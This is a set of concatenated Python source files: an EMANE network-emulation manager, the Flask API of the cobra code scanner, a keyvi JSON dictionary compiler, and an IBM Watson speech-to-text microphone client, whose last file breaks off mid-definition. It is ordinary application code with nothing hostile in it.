def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._objslock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(
net_index=0, remove=False, conf_required=False
)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
# slave server
session = self.session
if not session.master:
return
# not distributed
servers = session.broker.getservernames()
if len(servers) < 2:
return
# normal Config messaging will distribute controlnets
prefix = session.options.get_config("controlnet", default="")
prefixes = prefix.split()
if len(prefixes) < len(servers):
logging.info(
"setting up default controlnet prefixes for distributed (%d configured)",
len(prefixes),
)
prefix = ctrlnet.DEFAULT_PREFIX_LIST[0]
prefixes = prefix.split()
servers.remove("localhost")
servers.insert(0, "localhost")
prefix = " ".join("%s:%s" % (s, prefixes[i]) for i, s in enumerate(servers))
# this generates a config message having controlnet prefix assignments
logging.info("setting up controlnet prefixes for distributed: %s", prefix)
vals = "controlnet=%s" % prefix
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[: coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(
flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len :]
)
logging.debug("sending controlnet message:\n%s", msg)
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug(
"node(%s) already has model(%s)",
emane_node.id,
emane_node.model.name,
)
continue
# set model configured for node, due to legacy messaging configuration before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._objslock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(
self, ctrlnet, emane_node, nemid, platform_xmls
)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(
["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir
)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += ("-r",)
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.id
# control network not yet started here
self.session.add_remove_control_interface(
node, 0, remove=False, conf_required=False
)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(
node, otanetidx, remove=False, conf_required=False
)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(
node, eventservicenetidx, remove=False, conf_required=False
)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.network_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.network_cmd(args)
# start emane
args = emanecmd + [
"-f",
os.path.join(path, "emane%d.log" % n),
os.path.join(path, "platform%d.xml" % n),
]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
# TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we"ve started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
logging.error(
"Warning: EMANE events will not be generated "
"because the emaneeventservice\n binding was "
"unable to load "
"(install the python-emaneeventservice bindings)"
)
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
# reset the service, otherwise nextEvent won"t work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info(
"subscribing to EMANE location events. (%s)",
threading.currentThread().getName(),
)
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info(
"unsubscribing from EMANE location events. (%s)",
threading.currentThread().getName(),
)
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if (
"latitude" not in attrs
or "longitude" not in attrs
or "altitude" not in attrs
):
logging.warning("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.id
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info(
"location event NEM %s (%s, %s, %s) -> (%s, %s, %s)",
nemid,
lat,
lon,
alt,
x,
y,
z,
)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error(
"Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)",
nemid,
x,
y,
z,
)
return False
# generate a node message for this location update
try:
node = self.session.get_node(n)
except CoreError:
logging.exception(
"location event NEM %s has no corresponding node %s" % (nemid, n)
)
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702",
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(
_id="platform_id_start",
_type=ConfigDataTypes.INT32,
default="1",
label="Starting Platform ID (core)",
),
)
nem_config = [
Configuration(
_id="nem_id_start",
_type=ConfigDataTypes.INT32,
default="1",
label="Starting NEM ID (core)",
)
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len),
]
def __init__(self, session, _id=None):
super(EmaneGlobalModel, self).__init__(session, _id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
api.py | # -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <feei@feei.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import errno
import json
import multiprocessing
import os
import socket
import subprocess
import threading
import time
import traceback
import requests
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from werkzeug.urls import url_unquote
from . import cli
from .cli import get_sid
from .config import Config, running_path, package_path
from .engine import Running
from .log import logger
from .utils import allowed_file, secure_filename, PY2, split_branch
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
q = queue.Queue()
app = Flask(__name__, static_folder='templates/asset')
running_host = '0.0.0.0'
running_port = 5000
def producer(task):
q.put(task)
def consumer():
while True:
task = q.get()
p = multiprocessing.Process(target=cli.start, args=task)
p.start()
p.join()
q.task_done()
class AddJob(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
target = data.get("target")
formatter = data.get("formatter")
output = data.get("output")
rule = data.get("rule")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not target or target == "":
return {"code": 1002, "msg": "URL cannot be empty."}
if not formatter or formatter == '':
formatter = 'json'
if not output or output == '':
output = ''
if not rule or rule == '':
rule = ''
# Report All Id
a_sid = get_sid(target, True)
running = Running(a_sid)
# Write a_sid running data
running.init_list(data=target)
# Write a_sid running status
data = {
'status': 'running',
'report': ''
}
running.status(data)
if isinstance(target, list):
for t in target:
# Scan
arg = (t, formatter, output, rule, a_sid)
producer(task=arg)
result = {
'msg': 'Add scan job successfully.',
'sid': a_sid,
'total_target_num': len(target),
}
else:
arg = (target, formatter, output, rule, a_sid)
producer(task=arg)
result = {
'msg': 'Add scan job successfully.',
'sid': a_sid,
'total_target_num': 1,
}
return {"code": 1001, "result": result}
class JobStatus(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
sid = data.get("sid")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not sid or sid == "":
return {"code": 1002, "msg": "sid is required."}
sid = str(data.get("sid")) # 需要拼接入路径,转为字符串
running = Running(sid)
if running.is_file() is not True:
data = {
'code': 1004,
'msg': 'scan id does not exist!',
'sid': sid,
'status': 'no such scan',
'report': ''
}
return data
else:
result = running.status()
r_data = running.list()
if result['status'] == 'running':
ret = True
result['still_running'] = dict()
for s_sid, git in r_data['sids'].items():
if Running(s_sid).is_file(True) is False:
result['still_running'].update({s_sid: git})
ret = False
if ret:
result['status'] = 'done'
running.status(result)
data = {
'msg': 'success',
'sid': sid,
'status': result.get('status'),
'report': request.url_root + result.get('report'),
'still_running': result.get('still_running'),
'total_target_num': r_data.get('total_target_num'),
'not_finished': int(r_data.get('total_target_num')) - len(r_data.get('sids'))
+ len(result.get('still_running')),
}
return {"code": 1001, "result": data}
class FileUpload(Resource):
@staticmethod
def post():
"""
Scan by uploading compressed files
:return:
"""
if 'file' not in request.files:
return {'code': 1002, 'result': "File can't empty!"}
file_instance = request.files['file']
if file_instance.filename == '':
return {'code': 1002, 'result': "File name can't empty!"}
if file_instance and allowed_file(file_instance.filename):
filename = secure_filename(file_instance.filename)
dst_directory = os.path.join(package_path, filename)
file_instance.save(dst_directory)
# Start scan
a_sid = get_sid(dst_directory, True)
data = {
'status': 'running',
'report': ''
}
Running(a_sid).status(data)
try:
cli.start(dst_directory, None, 'stream', None, a_sid=a_sid)
except Exception as e:
traceback.print_exc()
code, result = 1001, {'sid': a_sid}
return {'code': code, 'result': result}
else:
return {'code': 1002, 'result': "This extension can't support!"}
class ResultData(Resource):
@staticmethod
def post():
"""
pull scan result data.
:return:
"""
data = request.json
if not data or data == "":
return {"code": 1003, "msg": "Only support json, please post json data."}
s_sid = data.get('sid')
if not s_sid or s_sid == "":
return {"code": 1002, "msg": "sid is required."}
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if not os.path.exists(s_sid_file):
return {'code': 1002, 'msg': 'No such target.'}
with open(s_sid_file, 'r') as f:
scan_data = json.load(f)
if scan_data.get('code') == 1001:
scan_data = scan_data.get('result')
else:
return {
'code': scan_data.get('code'),
'msg': scan_data.get('msg'),
}
rule_filter = dict()
for vul in scan_data.get('vulnerabilities'):
rule_filter[vul.get('id')] = vul.get('rule_name')
return {
'code': 1001,
'result': {
'scan_data': scan_data,
'rule_filter': rule_filter,
}
}
class ResultDetail(Resource):
@staticmethod
def post():
"""
get vulnerable file content
:return:
"""
data = request.json
if not data or data == "":
return {'code': 1003, 'msg': 'Only support json, please post json data.'}
sid = data.get('sid')
file_path = url_unquote(data.get('file_path'))
if not sid or sid == '':
return {"code": 1002, "msg": "sid is required."}
if not file_path or file_path == '':
return {'code': 1002, 'msg': 'file_path is required.'}
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=sid))
if not os.path.exists(s_sid_file):
return {'code': 1002, 'msg': 'No such target.'}
with open(s_sid_file, 'r') as f:
target_directory = json.load(f).get('result').get('target_directory')
if not target_directory or target_directory == '':
return {'code': 1002, 'msg': 'No such directory'}
if PY2:
file_path = map(secure_filename, [path.decode('utf-8') for path in file_path.split('/')])
else:
file_path = map(secure_filename, [path for path in file_path.split('/')])
filename = target_directory
for _dir in file_path:
filename = os.path.join(filename, _dir)
if os.path.exists(filename):
extension = guess_type(filename)
if is_text(filename):
with open(filename, 'r') as f:
file_content = f.read()
else:
file_content = 'This is a binary file.'
else:
return {'code': 1002, 'msg': 'No such file.'}
return {'code': 1001, 'result': {'file_content': file_content, 'extension': extension}}
class Search(Resource):
@staticmethod
def post():
"""
Search specific rule.
:return:
"""
data = request.json
if not data or data == "":
return {'code': 1003, 'msg': 'Only support json, please post json data.'}
sid = data.get('sid')
if not sid or sid == '':
return {'code': 1002, 'msg': 'sid is required.'}
rule_id = data.get('rule_id')
if not rule_id or rule_id == '':
return {'code': 1002, 'msg': 'rule_id is required.'}
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid))
if not os.path.exists(scan_list_file):
return {'code': 1002, 'msg': 'No such sid.'}
with open(scan_list_file, 'r') as f:
scan_list = json.load(f)
if not isinstance(rule_id, list):
rule_id = [rule_id]
search_data = list()
for s_sid in scan_list.get('sids').keys():
target, branch = split_branch(scan_list.get('sids').get(s_sid))
search_result = search_rule(s_sid, rule_id)
cvi_count = list(search_result.values())
if int(cvi_count[0]) > 0:
search_data.append({
'target_info': {
'sid': s_sid,
'target': target,
'branch': branch,
},
'search_result': search_result,
})
return {
'code': 1001,
'result': search_data,
}
@app.route('/', methods=['GET', 'POST'])
def summary():
a_sid = request.args.get(key='sid')
key = Config(level1="cobra", level2="secret_key").value
if a_sid is None:
return render_template(template_name_or_list='index.html',
key=key)
status_url = 'http://{host}:{port}/api/status'.format(host=running_host, port=running_port)
post_data = {
'key': key,
'sid': a_sid,
}
headers = {
"Content-Type": "application/json",
}
r = requests.post(url=status_url, headers=headers, data=json.dumps(post_data))
try:
scan_status = json.loads(r.text)
except ValueError as e:
return render_template(template_name_or_list='error.html',
msg='Check scan status failed: {0}'.format(e))
if scan_status.get('code') != 1001:
return render_template(template_name_or_list='error.html',
msg=scan_status.get('msg'))
else:
if scan_status.get('result').get('status') == 'running':
still_running = scan_status.get('result').get('still_running')
for s_sid, target_str in still_running.items():
target, branch = split_branch(target_str)
still_running[s_sid] = {'target': target,
'branch': branch}
else:
still_running = dict()
scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
scan_list = Running(a_sid).list()
start_time = os.path.getctime(filename=scan_status_file)
start_time = time.localtime(start_time)
start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
total_targets_number = scan_status.get('result').get('total_target_num')
not_finished_number = scan_status.get('result').get('not_finished')
total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
rule_num = dict()
rules = dict()
targets = list()
for s_sid, target_str in scan_list.get('sids').items():
if s_sid not in still_running:
target_info = dict()
# 分割项目地址与分支,默认 master
target, branch = split_branch(target_str)
target_info.update({
'sid': s_sid,
'target': target,
'branch': branch,
})
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
with open(s_sid_file, 'r') as f:
s_sid_data = json.load(f)
if s_sid_data.get('code') != 1001:
continue
else:
s_sid_data = s_sid_data.get('result')
total_vul_number += len(s_sid_data.get('vulnerabilities'))
target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))})
target_info.update(s_sid_data)
targets.append(target_info)
for vul in s_sid_data.get('vulnerabilities'):
if 9 <= int(vul.get('level')) <= 10:
critical_vul_number += 1
elif 6 <= int(vul.get('level')) <= 8:
high_vul_number += 1
elif 3 <= int(vul.get('level')) <= 5:
medium_vul_number += 1
elif 1 <= int(vul.get('level')) <= 2:
low_vul_number += 1
try:
rule_num[vul.get('rule_name')] += 1
except KeyError:
rule_num[vul.get('rule_name')] = 1
rules[vul.get('id')] = vul.get('rule_name')
return render_template(template_name_or_list='summary.html',
total_targets_number=total_targets_number,
not_finished_number=not_finished_number,
start_time=start_time,
targets=targets,
a_sid=a_sid,
total_vul_number=total_vul_number,
critical_vul_number=critical_vul_number,
high_vul_number=high_vul_number,
medium_vul_number=medium_vul_number,
low_vul_number=low_vul_number,
rule_num=rule_num,
rules=rules,
running=still_running,)
def key_verify(data):
key = Config(level1="cobra", level2="secret_key").value
_key = data.get("key")
if _key == key:
return True
elif not _key or _key == "":
return {"code": 1002, "msg": "Key cannot be empty."}
elif not _key == key:
return {"code": 4002, "msg": "Key verify failed."}
else:
return {"code": 4002, "msg": "Unknown key verify error."}
def is_text(fn):
msg = subprocess.Popen(['file', fn], stdout=subprocess.PIPE).communicate()[0]
return 'text' in msg.decode('utf-8')
def guess_type(fn):
import mimetypes
extension = mimetypes.guess_type(fn)[0]
if extension:
"""text/x-python or text/x-java-source"""
# extension = extension.split('/')[1]
extension = extension.replace('-source', '')
else:
extension = fn.split('/')[-1].split('.')[-1]
custom_ext = {
'html': 'htmlmixed',
'md': 'markdown',
}
if custom_ext.get(extension) is not None:
extension = custom_ext.get(extension)
return extension.lower()
def search_rule(sid, rule_id):
"""
Search specific rule name in scan data.
:param sid: scan data id
:param rule_id: a list of rule name
:return: {rule_name1: num1, rule_name2: num2}
"""
scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=sid))
search_result = dict.fromkeys(rule_id, 0)
if not os.path.exists(scan_data_file):
return search_result
with open(scan_data_file, 'r') as f:
scan_data = json.load(f)
if scan_data.get('code') == 1001 and len(scan_data.get('result').get('vulnerabilities')) > 0:
for vul in scan_data.get('result').get('vulnerabilities'):
if vul.get('id') in rule_id:
search_result[vul.get('id')] += 1
return search_result
else:
return search_result
def start(host, port, debug):
logger.info('Start {host}:{port}'.format(host=host, port=port))
api = Api(app)
api.add_resource(AddJob, '/api/add')
api.add_resource(JobStatus, '/api/status')
api.add_resource(FileUpload, '/api/upload')
api.add_resource(ResultData, '/api/list')
api.add_resource(ResultDetail, '/api/detail')
api.add_resource(Search, '/api/search')
# consumer
threads = []
for i in range(5):
threads.append(threading.Thread(target=consumer, args=()))
for i in threads:
i.setDaemon(daemonic=True)
i.start()
try:
global running_port, running_host
running_host = host if host != '0.0.0.0' else '127.0.0.1'
running_port = port
app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
except socket.error as v:
if v.errno == errno.EACCES:
logger.critical('[{err}] must root permission for start API Server!'.format(err=v.strerror))
exit()
else:
logger.critical('{msg}'.format(msg=v.strerror))
logger.info('API Server start success')
|
compile_json.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import Queue
import threading
import keyvi
import argparse
import os
import gzip
import unicodedata, re
control_chars = ''.join(map(unichr, range(0,32)))
control_char_re = re.compile('[%s]' % re.escape(control_chars))
def remove_control_chars(s):
return control_char_re.sub('', s)
def compile_worker():
while True:
compiler, output = compile_queue.get()
compiler.Compile()
compiler.WriteToFile(output)
compile_queue.task_done()
compile_queue = Queue.Queue()
def compile_file(input, output, jobs, shards):
skipped_keys = 0
compilers = {}
for i in range (0, shards):
compilers[i] = keyvi.JsonDictionaryCompiler()
if os.path.isdir(input):
input_files = [os.path.join(input,d) for d in os.listdir(input)]
else:
input_files = [input]
for input_file in input_files:
if input_file.endswith(".gz"):
input_fd = gzip.open(input_file)
else:
input_fd = open(input_file)
for line in input_fd:
try:
parts = line.split("\t")
key = parts[0]
if key != remove_control_chars(key):
print "skip key: " + ":".join("{:02x}".format(ord(c)) for c in key) + " due to containing control characters"
skipped_keys +=1
value = parts[1]
shard = keyvi.JumpConsistentHashString(key, shards)
compilers[shard].Add(key, value)
except:
print "failed to add: " + line
print "Skipped keys " + str(skipped_keys)
for i in range(jobs):
t = threading.Thread(target=compile_worker)
t.daemon = True
t.start()
if shards == 1:
compile_queue.put((compilers[i], output))
else:
for i in range (0, shards):
compile_queue.put((compilers[i], output + "-" + str(i)))
compile_queue.join()
ARGV = [
('-i', '--input', str, None, 'input file'),
('-o', '--output', str, None, 'output'),
('-b', '--bucket', str, None, 's3 bucket to read from'),
('-k', '--s3key', str, None, 's3 key/folder to read from'),
('-j', '--jobs', int, 1, 'number of parallel jobs'),
('-s', '--shards', int, 1, 'number of shards'),
]
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Compile json keyvi dictionaries')
for arg in ARGV:
parser.add_argument(*arg[0:2], type=arg[2], default=arg[3], help=arg[4])
args = parser.parse_args()
if args.input:
compile_file(args.input, args.output, args.jobs, args.shards)
|
ibmstt2.py | import re
import logging, traceback
from websocket import create_connection
from watson_developer_cloud import AuthorizationV1, SpeechToTextV1
import json
import threading
import sys, os
import time
from configparser import SafeConfigParser
######
try:
parser = SafeConfigParser()
parser.read(sys.argv[1] + "/../settings.conf")
USERNAME = parser.get('STT_settings', 'username')
PASSWORD = parser.get('STT_settings', 'password')
except Exception as e:
logging.error(str(e))
logging.warning("Could not load IBM STT configuration settings. Cannot connect websocket. Disconnecting...")
sys.exit()
logging.basicConfig(
filename="stt_debug.log",
level=1,
format="*****\n%(asctime)s||%(levelname)s||line %(lineno)d||%(funcName)s: %(message)s",
datefmt='%m/%d/%Y %I:%M:%S %p'
)
logging.info("---------NEW DEBUG SESSION---------")
def logExecutionInfo():
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
logging.error(''.join('!! ' + line for line in lines))
import pyaudio
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
CHUNK = 1024
CHUNKSIZE = 4000
RECORD_SECONDS = 6000
WAVE_OUTPUT_FILENAME = "speech.wav"
TIMEOUT_LIMIT = 3
TIME_SINCE_RESPONSE = 0
TIME_AT_RESPONSE = time.time() + 8
ws = None
token = None
t3 = None
isRestarting = False
def resetConnection():
global ws
global token
global t3
global isRestarting
logging.info("Restarting WS...")
try:
ws.close()
except Exception as e:
logging.error("Could not close WebSocket: " + str(e))
ws = None
logging.info("\tClosed previous websocket...")
try:
ws = create_connection('wss://stream.watsonplatform.net/speech-to-text/api/v1/recognize?watson-token=' +
token + '&model=en-US_BroadbandModel')
except Exception as e:
logging.error("Creating WS failed, error: " + str(e))
logExecutionInfo()
return
logging.info("\tEstablished WS connection...")
ws.send('{"action":"start","content-type":"audio/l16;rate=16000","interim_results":true,"inactivity_timeout":600}')
logging.info("\tSent initiation request to IBM")
logging.info("Websocket recreated, starting Mic stream again...")
isRestarting = False
#getMicData(ws)
def getMicData():
global totalData
global isRestarting
global ws
audio = pyaudio.PyAudio()
# start Recording
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True, #input_device_index=inputDeviceIndex,
frames_per_buffer=CHUNK)
logging.info("Mic stream initiated, recording...")
frames = []
totalData = b''
bytesSent = 0
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
try:
logging.info("Reading stream chunk " + str(i))
data = stream.read(CHUNK, False)
except Exception as e:
logging.error("Stream reading failed, error: " + str(e))
try:
logging.info("Appending stream data for chunk " + str(i) + "...")
totalData += data
except Exception as e:
logging.error("Appending stream data to websocket buffer failed: " + str(e))
totalData = b''
if len(totalData) > CHUNKSIZE:
try:
dataChunk = totalData[0:CHUNKSIZE]
dataStr = str(dataChunk)
#matched = re.search(r'&\w+;', dataStr)
#try:
# dataStr = dataStr.encode('utf-8')
logging.info("Sending data chunk " + str(i))
ws.send(dataChunk, opcode=0x2)
#except Exception as e:
# logging.error("Invalid binary message detected. Dumping message. Error type " + type(e).__name__ + ": " + str(e))
# totalData = totalData[CHUNKSIZE:]
except (OSError) as e:
logging.error("Invalid binary message detected. Dumping message. Error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
totalData = totalData[CHUNKSIZE:]
resetConnection()
except Exception as e:
logging.error("Sending failed, error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
totalData = totalData[CHUNKSIZE:]
resetConnection()
try:
logging.info("Stripping used data chunk " + str(i) + " from websocket buffer...")
totalData = totalData[CHUNKSIZE:]
except Exception as e:
logging.error("Stripping CHUNKSIZE from websocket buffer failed: " + str(e))
#ws.send(data, opcode=0x2)
#bytesSent = i * CHUNKSIZE
#print(str(bytesSent/1000/1000) + " megabytes")
logging.info("Mic stream has finished recording, closing stream, terminating audio...")
# stop Recording
stream.stop_stream()
stream.close()
audio.terminate()
######
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def receiveAudio():
